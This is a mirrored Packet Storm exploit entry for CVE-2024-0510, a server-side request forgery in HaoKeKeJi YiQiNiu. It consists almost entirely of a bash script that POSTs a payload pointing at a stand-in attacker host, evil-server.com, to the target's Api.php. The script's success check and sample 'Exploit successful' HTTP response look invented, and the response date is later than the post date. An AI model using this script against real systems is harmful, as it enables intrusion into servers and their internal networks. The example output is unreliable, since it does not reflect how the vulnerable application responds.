HaoKeKeJi YiQiNiu Server-Side Request Forgery
2024-1-15 21:23:29 Author: packetstormsecurity.com(查看原文) 阅读量:7 收藏

#!/bin/bash

# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"

# Send the malicious request
response=$(curl -s -X POST -d "$payload" "$target_url")

# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
echo "Exploit succeeded"
else
echo "Exploit failed"
fi

# Example payload and response
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive

Exploit successful"


文章来源: https://packetstormsecurity.com/files/176547/CVE-2024-0510.sh.txt
如有侵权请联系:admin#unsafe.sh